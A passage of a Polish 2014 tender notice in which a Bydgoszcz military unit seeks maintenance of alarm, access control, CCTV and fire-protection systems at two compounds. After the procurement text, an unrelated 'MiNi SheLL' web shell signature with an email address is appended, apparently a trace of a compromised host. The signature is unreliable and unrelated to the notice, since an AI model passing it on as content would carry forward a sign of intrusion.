<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>ad III.3.1. na potwierdzenie spełniania warunku przedstawionego w pkt. 10.A)1) SIWZ Zamawiający wskazał w pkt. III.4.1) ogłoszenia iż wymaga złożenia koncesji, zezwolenia lub licencji. Doprecyzowując zapis, Zamawiający informuje, iż zgodnie z zapisami SIWZ dokumentami wymaganymi są: 1. aktualna
koncesja MSWiA, 2. aktualne świadectwo bezpieczeństwa przemysłowego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany treści niniejszej umowy oraz jej uzupełniania wymagają zgody umawiających się Stron wyrażonej na piśmie w formie aneksu podpisanego przez obie Strony pod rygorem nieważności. Powyższe nie dotyczy wyjątków wskazanych w umowie.
2. 	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika 
z zaistnienia następujących warunków:
1)	w przypadku zaistnienia sytuacji nadzwyczajnych i niecierpiących zwłoki w zakresie wymaganego od Zamawiającego wsparcia dla jednostek (instytucji) rozmieszczonych 
w kompleksie przy ul. Szubińskiej 2 oraz ul. Szubińskiej 105* (* odpowiednio do zadania),
2)	zaistnienia obiektywnych, niezależnych od Stron przeszkód w realizacji umowy 
w dotychczasowym kształcie, w tym siły wyższej oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
3)	zaistnienia konieczności przedłużenia terminu realizacji umowy, w przypadku zaistnienia obiektywnych, niezależnych od Wykonawcy przeszkód w realizacji umowy w terminie 
jej obowiązywania, których nie można było przewidzieć w chwili zawarcia umowy 
(np. niedostępności niezbędnych do dokonania napraw materiałów, części, itp.),
4)	zaistnienia konieczności zwiększenia wartości umowy spowodowanej potrzebą zakupu podzespołów, materiałów, środków, usług oraz części o których mowa w § 3 ust. 6 niniejszej umowy, z zastrzeżeniem, że zmiana ta będzie możliwa jedynie w przypadku posiadania środków finansowych przez Zamawiającego,
5)	potrzeby zmian wynikających z postanowień niniejszej umowy,
6)	zmiany te są korzystne lub neutralne dla Zamawiającego,
7)	zmiany przepisów prawa, powodujące konieczność dostosowania warunków zawartych 
w umowie do obowiązującego stanu prawnego.
3.	Zmiany przewidziane w umowie mogą być wprowadzone na wniosek Strony umowy.
4.	Warunkiem wprowadzenia zmian, o których mowa w ust. 2 jest złożenie wniosku o którym mowa 
w ust. 3 wraz z uzasadnieniem zawierającym, odpowiednio: opis i uzasadnienie propozycji zmian, opis wpływu zmiany na harmonogram, koszty i termin wykonania umowy.
5.	W przypadku zaistnienia okoliczności, o których mowa w ust. 2 pkt. 3), Zamawiający może wydłużyć termin realizacji umowy o czas niezbędny, celem należytego wykonania zobowiązań umownych Wykonawcy, z zastrzeżeniem, że nie może to powodować żadnych dodatkowych kosztów 
dla Zamawiającego, poza określonymi w § 3 ust. 6 niniejszej umowy. Warunkiem wprowadzenia zmian, o których mowa w ust. 2 pkt. 3), poza wskazanymi w ust. 4, jest dostarczenie dokumentu podpisanego przez uprawnione osoby potwierdzającego w sposób obiektywny zaistnienie okoliczności, na które powołuje się Wykonawca.
6.	Warunki gwarancji producentów sprzętu objętego niniejszą umową, nie wyłączają postanowień warunków gwarancyjnych udzielonych Zamawiającemu (Zakładowi Inwestycji Organizacji Traktatu Północnoatlantyckiego) przez Wykonawców systemów firma HERTZ. (dotyczy zadania nr 5 i 6).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mon.gov.pl/ogloszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4246, ul. Szubińska 2, 85-915 Bydgoszcz, pomieszczenie nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2014 godzina 11:00, miejsce: Jednostka Wojskowa Nr 4246, ul. Szubińska 2, 85-915 Bydgoszcz, Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin otwarcia ofert: w dniu 18.11.2014 r. o godz. 11:30. Termin wykonania zamówienia: Zadanie Nr 1 Od dnia udzielenia zamówienia, nie wcześniej jednak niż od dnia 01.01.2015 r. do dnia 10.12.2015 r. Zadanie Nr 2 Od dnia udzielenia zamówienia, nie wcześniej jednak niż od dnia 01.01.2015 r. 
do dnia 10.12.2015 r. Zadanie Nr 3 Od dnia udzielenia zamówienia, nie wcześniej jednak niż od dnia 01.01.2015 r. do dnia 31.12.2015 r. Zadanie Nr 4 Od dnia udzielenia zamówienia, nie wcześniej jednak niż od dnia 01.01.2015 r. do dnia 31.12.2015 r. Zadanie Nr 5 Od dnia udzielenia zamówienia, nie wcześniej jednak niż od dnia 01.01.2015 r. do dnia 31.12.2015 r. Zadanie Nr 6 Od dnia udzielenia zamówienia, nie wcześniej jednak niż od dnia 01.01.2015 r. do dnia 31.12.2015 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> realizacja - od 01.01.2015 do 10.12.2015 r.: 
Zakresem usługi objęte są wszystkie elementy systemów ochrony technicznej w skład których wchodzą:
- 	system sygnalizacji włamania i napadu (SSWiN), 
- 	system kontroli dostępu (SKD), 
- 	śluzy antynapadowe sprzężone z SKD (Śluzy SKD), 
- 	telewizyjny system nadzoru (TSN). 
Wyżej wymienione systemy znajdują się w jednym obiekcie na terenie kompleksu 
przy ul. Szubińskiej 105. 
Wyżej wymienione systemy (za wyjątkiem Śluz antynapadowych SKD) objęte są gwarancją przez :
ZEUS S.A z siedzibą przy  ul. Obrońców Westerplatte 1, 83-00 Pruszcz Gdański
Śluzy antynapadowe SKD są objęte gwarancją firmy:
DFE Security Sp. z o.o. ul. Białołęcka 233A, 03-253 Warszawa
Wyżej wymienione systemy zainstalowane są w jednym obiekcie (budynku) i podlegają wyłącznie konserwacji przez Wykonawcę. Za naprawę wyżej wymienionych systemów odpowiedzialne są podmioty będące Gwarantem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.60.00.00-1, 50.71.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> realizacja - od 01.01.2015 do 10.12.2015 r.: 
1) Zakresem usługi objęte są wyłącznie dwie śluzy antynapadowe typ ETA UNO E1 
w ramach przeglądu gwarancyjnego producenta urządzeń.
Wyżej wymienione śluzy znajdują się na terenie obiektu w kompleksie 
przy ul. Szubińskiej 105. 
Wykaz urządzeń wchodzących w skład konserwowanych systemów zawiera załącznik 
nr 13 do niniejszej SIWZ. 
Konserwacja śluz SKD musi w być wykonana dwukrotnie w ciągu 2015 r., 
tj. w I oraz III kwartale, zgodnie z warunkami gwarancji zamieszczonymi 
w dokumentacji powykonawczej oraz w zakresie zgodnym z Normą Obronną NO-04-A004-8 Obiekty Wojskowe - Systemy Alarmowe - Eksploatacja.
Śluzy antynapadowe SKD są objęte gwarancją producenta:
DFE Security Sp. z o.o. ul. Białołęcka 233A, 03-253 Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.60.00.00-1, 50.71.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> realizacja - od 01.01.2015 do 31.12.2015 r.: 
1) 	Zakresem usługi objęte są wszystkie elementy systemów ochrony technicznej w skład których wchodzą:
- 	system sygnalizacji włamania i napadu (SSWiN) - 5 budynków oraz teren kompleksu;
- 	system kontroli dostępu (SKD) - 5 budynków oraz teren kompleksu;
- 	telewizyjny system nadzoru (TSN) - 3 budynki oraz teren kompleksu.
Wyżej wymienione systemy znajdują się w na terenie kompleksu przy ul. Szubińskiej 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.60.00.00-1, 50.71.00.00-5, 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> realizacja - od 01.01.2015 do 31.12.2015 r.: 
1)	Zakresem usługi objęte są wszystkie elementy systemów ochrony technicznej w skład których wchodzą:
- 	systemy sygnalizacji włamania i napadu (SSWiN) - 6 budynków;
- 	systemy kontroli dostępu zintegrowane z  systemami sygnalizacji włamania 
i napadu (SSWiN/SKD) - 5 budynków;
- 	system kontroli dostępu (SKD) - 5 budynki;
- 	telewizyjne systemy nadzoru (TSN) - 6 budynków. 
Wyżej wymienione systemy znajdują się na terenie kompleksu przy ul. Szubińskiej 2 oraz Szubińskiej 105.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.60.00.00-1, 50.71.00.00-5, 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> realizacja - od 01.01.2015 do 31.12.2015 r.: 
Usługa podlegająca na okresowej konserwacji i naprawie  systemów ochrony technicznej ppoż. w skład których wchodzą:
- system sygnalizacji pożaru (SSP), (w budynku nr 6 systemem jest na gwarancji. Około 10% systemu.).
- stałe urządzenia gaśnicze (SUG),
- systemy oddymiania klatek schodowych (Oddymianie),
Firma prowadząca konserwację powinna dysponować odpowiednią wiedzą teoretyczną i praktyczną. Powinna być autoryzowana przez producenta urządzeń, jak również posiadać wszystkie wymagane, udokumentowane kwalifikacje krajowe. 
Dotyczy w szczególności centrali przeciwpożarowej firmy Schrack Seconet.
1) 	Zakresem usługi objęte są wszystkie elementy systemów ochrony ppoż. w skład których wchodzą:
- 	system sygnalizacji pożaru (SSP) - 5 budynków;
- 	stałe urządzenia gaśnicze (SUG) - 1 budynek;
- 	systemy oddymiania klatek schodowych (Oddymianie) - 4 budynki;
Wyżej wymienione systemy znajdują się na terenie kompleksu przy ul. Szubińskiej 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.60.00.00-1, 50.71.00.00-5, 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> realizacja - od 01.01.2015 do 31.12.2015 r.: 
1) Zakresem usługi objęte są wszystkie elementy systemu DSO.
2) Konserwacja urządzeń systemu DSO musi być wykonana raz na pół roku zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z 7.06.2010 r. w sprawie ochrony przeciwpożarowej budynków w zakresie:
- Sprawdzenie danych systemowych,
- Sprawdzenie układów zasilania podstawowego i rezerwowego,
- Sprawdzenie urządzeń sterujących systemu,
- Sprawdzenie poprawności pracy elementów systemu a w nim: 
- raz na pół roku należy przeprowadzić test pracy 50 % głośników zainstalowanych po 25% na każdej z 2 linii w taki sposób aby w ciągu roku zostały sprawdzone wszystkie głośniki. Próbę należy prowadzić 
poprzez wyemitowanie przez testowane linie głośnikowe dowolnego sygnału przy użyciu mikrofonu i mikrofonu strażaka oraz nagranych komunikatów na wypadek wystąpienia pożaru lub innego zagrożenia. W trakcie sprawdzania kontrolujemy czy głośniki na danej linii poprawnie emitują sygnał testowy,
- podczas powyższego testu należy sprawdzić, czy nie wystąpiły zmiany w aranżacji wymagające zmian w rozmieszczeniu głośników lub zmiany ich ilości oraz poprawności eksploatacji elementów systemu (ewentualne zabrudzenia, zamalowania lub uszkodzenia mechaniczne głośników).
Firma prowadząca konserwację powinna dysponować odpowiednią wiedzą teoretyczną i praktyczną. Powinna być autoryzowana przez producenta urządzeń, jak również posiadać wszystkie wymagane, udokumentowane kwalifikacje krajowe. 
Dotyczy w szczególności centrali przeciwpożarowej firmy Schrack Seconet.
Wyżej wymieniony system znajduje się na terenie kompleksu przy ul. Szubińskiej 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.60.00.00-1, 50.71.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com